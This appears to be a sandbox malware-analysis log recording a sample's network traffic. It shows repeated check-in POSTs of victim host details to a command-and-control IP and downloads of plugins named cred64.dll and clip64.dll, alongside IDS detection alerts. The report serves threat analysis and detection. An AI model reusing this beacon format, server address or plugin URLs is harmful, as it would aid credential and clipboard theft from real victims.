                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: global trafficHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: Joe Sandbox ViewIP Address: 193.3.19.154 193.3.19.154
                  Source: Joe Sandbox ViewASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49730 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49734 -> 193.3.19.154:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 193.3.19.154:80
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/cred64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: global trafficHTTP traffic detected: GET /store/games/Plugins/clip64.dll HTTP/1.1Host: 193.3.19.154
                  Source: unknownHTTP traffic detected: POST /store/games/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.3.19.154Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 36 37 37 30 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=367706&un=user&dm=&av=13&lv=0&og=1
                  Source: oneetx.exe, 00000001.00000002.4210344439.0000000000C96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.3.19.154/store/games/Plugins/clip64.dll
